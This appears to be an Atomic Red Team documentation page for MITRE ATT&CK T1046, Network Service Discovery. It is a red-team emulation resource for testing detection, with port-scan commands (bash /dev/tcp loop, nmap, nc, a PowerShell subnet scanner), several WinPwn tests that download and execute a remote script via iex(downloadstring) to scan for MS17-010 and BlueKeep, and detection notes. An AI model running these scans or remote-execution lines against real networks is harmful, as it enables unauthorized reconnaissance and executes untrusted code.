Ctrl+K

T1046 - Network Service Discovery

Contents

T1046 - Network Service Discovery#

Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation. Common methods to acquire this information include port and/or vulnerability scans using tools that are brought onto a system.(Citation: CISA AR21-126A FIVEHANDS May 2021)

Within cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.

Within macOS environments, adversaries may use the native Bonjour application to discover services running on other macOS hosts within a network. The Bonjour mDNSResponder daemon automatically registers and advertises a host’s registered services on the network. For example, adversaries can use a mDNS query (such as dns-sd -B _ssh._tcp .) to find other systems broadcasting the ssh service.(Citation: apple doco bonjour description)(Citation: macOS APT Activity Bradley)

Atomic Tests#

Atomic Test #1 - Port ScanScan ports to check for listening ports.#

Upon successful execution, sh will perform a network connection against a single host (192.168.1.1) and determine what ports are open in the range of 1-65535. Results will be via stdout. Supported Platforms: linux, macos#### Attack Commands: Run with bash

for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/192.168.1.1/$port) && echo port $port is open ; done

Invoke-AtomicTest T1046 -TestNumbers 1

Atomic Test #2 - Port Scan Nmap#

Scan ports to check for listening ports with Nmap. Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout.

Supported Platforms: linux, macos

Elevation Required (e.g. root or admin)

Dependencies: Run with sh!#

Description: Check if nmap command exists on the machine#
Check Prereq Commands:#
if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi;
Get Prereq Commands:#
(which yum && yum -y install epel-release nmap)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)||(which pkg && pkg install -y nmap)
Description: Check if nc command exists on the machine#
Check Prereq Commands:#
if [ -x "$(command -v nc)" ]; then exit 0; else exit 1; fi;
Get Prereq Commands:#
(which yum && yum -y install epel-release nc)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y netcat)||(which pkg && pkg install -y netcat)
Description: Check if telnet command exists on the machine#
Check Prereq Commands:#
if [ -x "$(command -v telnet)" ]; then exit 0; else exit 1; fi;
Get Prereq Commands:#
(which yum && yum -y install epel-release telnet)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y telnet)

Invoke-AtomicTest T1046 -TestNumbers 2 -GetPreReqs

Attack Commands: Run with sh#

sudo nmap -sS 192.168.1.0/24 -p 80
telnet 192.168.1.1 80
nc -nv 192.168.1.1 80

Invoke-AtomicTest T1046 -TestNumbers 2

Atomic Test #3 - Port Scan NMap for Windows#

Scan ports to check for listening ports for the local host 127.0.0.1 Supported Platforms: windows

Elevation Required (e.g. root or admin)

Dependencies: Run with powershell!#

Description: NMap must be installed#
Check Prereq Commands:#
if (cmd /c "nmap 2>nul") {exit 0} else {exit 1}
Get Prereq Commands:#
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\nmap-7.80-setup.exe" https://nmap.org/dist/nmap-7.80-setup.exe
Start-Process "PathToAtomicsFolder\..\ExternalPayloads\nmap-7.80-setup.exe" /S

Invoke-AtomicTest T1046 -TestNumbers 3 -GetPreReqs

Attack Commands: Run with powershell#

nmap 127.0.0.1```

Invoke-AtomicTest T1046 -TestNumbers 3

Atomic Test #4 - Port Scan using python#

Scan ports to check for listening ports with python

Supported Platforms: windows

Dependencies: Run with powershell!#

Description: Check if python exists on the machine#
Check Prereq Commands:#
if (python --version) {exit 0} else {exit 1}
Get Prereq Commands:#
echo "Python 3 must be installed manually"

Invoke-AtomicTest T1046 -TestNumbers 4 -GetPreReqs

Attack Commands: Run with powershell#

python "PathToAtomicsFolder\T1046\src\T1046.py" -i 127.0.0.1

Invoke-AtomicTest T1046 -TestNumbers 4

Atomic Test #5 - WinPwn - spoolvulnscanStart MS-RPRN RPC Service Scan using spoolvulnscan function of WinPwnSupported Platforms: windows#### Attack Commands: Run with powershell#

$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput```

Invoke-AtomicTest T1046 -TestNumbers 5

Atomic Test #6 - WinPwn - MS17-10Search for MS17-10 vulnerable Windows Servers in the domain using powerSQL function of WinPwnSupported Platforms: windows#### Attack Commands: Run with powershell#

$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput```

Invoke-AtomicTest T1046 -TestNumbers 6

Atomic Test #7 - WinPwn - bluekeepSearch for bluekeep vulnerable Windows Systems in the domain using bluekeep function of WinPwn. Can take many minutes to complete (~600 seconds in testing on a small domain).Supported Platforms: windows#### Attack Commands: Run with powershell#

$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput```

Invoke-AtomicTest T1046 -TestNumbers 7

Atomic Test #8 - WinPwn - fruitSearch for potentially vulnerable web apps (low hanging fruits) using fruit function of WinPwnSupported Platforms: windows#### Attack Commands: Run with powershell#

$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput```

Invoke-AtomicTest T1046 -TestNumbers 8

Atomic Test #9 - Network Service Discovery for Containers#

Attackers may try to obtain a list of services that are operating on remote hosts and local network infrastructure devices, in order to identify potential vulnerabilities that can be exploited through remote software attacks. They typically use tools to conduct port and vulnerability scans in order to obtain this information. Supported Platforms: containers

Dependencies: Run with sh!#

Description: Verify docker is installed.#
Check Prereq Commands:#
which docker
Get Prereq Commands:#
if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi
Description: Verify docker service is running.#
Check Prereq Commands:#
sudo systemctl status docker  --no-pager
Get Prereq Commands:#
sudo systemctl start docker

Invoke-AtomicTest T1046 -TestNumbers 9 -GetPreReqs

Attack Commands: Run with sh#

docker build -t t1046 /root/AtomicRedTeam/atomics/T1046/src/
docker run --name t1046_container  -d -t t1046
docker exec t1046_container ./test.sh```

Invoke-AtomicTest T1046 -TestNumbers 9

Cleanup:#

docker stop t1046_container
docker rmi -f t1046```

Invoke-AtomicTest T1046 -TestNumbers 9 -Cleanup

Atomic Test #10 - Port-Scanning /24 Subnet with PowerShellScanning common ports in a /24 subnet. If no IP address for the target subnet is specified the test tries to determine the attacking machine’s “primary” IPv4 address first and then scans that address with a /24 netmask.#

The connection attempts to use a timeout parameter in milliseconds to speed up the scan. Please note the atomic might not print any output until the scans are completed. Supported Platforms: windows#### Attack Commands: Run with powershell

$ipAddr = ""
if ($ipAddr -eq "") {
    # Assumes the "primary" interface is shown at the top
    $interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
    Write-Host "[i] Using Interface $interface"
    $ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"

$ports = 445, 3389
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }

foreach ($ip in $subnetIPs) {
    foreach ($port in $ports) {
      try {
          $tcp = New-Object Net.Sockets.TcpClient
          $tcp.ConnectAsync($ip, $port).Wait(200) | Out-Null
      } catch {}
      if ($tcp.Connected) {
          $tcp.Close()
          Write-Host "Port $port is open on $ip"
      }
    }
}

Invoke-AtomicTest T1046 -TestNumbers 10

Detection#

System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.

Normal, benign system and network events from legitimate remote service scanning may be uncommon, depending on the environment and how they are used. Legitimate open port and vulnerability scanning may be conducted within the environment and will need to be deconflicted with any detection capabilities developed. Network intrusion detection systems can also be used to identify scanning activity. Monitor for process use of the networks and inspect intra-network flows to detect port scans.

Shield Active Defense#

Software Manipulation#

Make changes to a system’s software properties and functions to achieve a desired effect.

Software Manipulation allows a defender to alter or replace elements of the operating system, file system, or any other software installed and executed on a system.

Opportunity#

There is an opportunity for the defender to observe the adversary and control what they can see, what effects they can have, and/or what data they can access.

Use Case#

A defender can change the output of a recon commands to hide simulation elements you don’t want attacked and present simulation elements you want the adversary to engage with.

Procedures#

Hook the Win32 Sleep() function so that it always performs a Sleep(1) instead of the intended duration. This can increase the speed at which dynamic analysis can be performed when a normal malicious file sleeps for long periods before attempting additional capabilities. Hook the Win32 NetUserChangePassword() and modify it such that the new password is different from the one provided. The data passed into the function is encrypted along with the modified new password, then logged so a defender can get alerted about the change as well as decrypt the new password for use. Alter the output of an adversary’s profiling commands to make newly-built systems look like the operating system was installed months earlier. Alter the output of adversary recon commands to not show important assets, such as a file server containing sensitive data.

Contents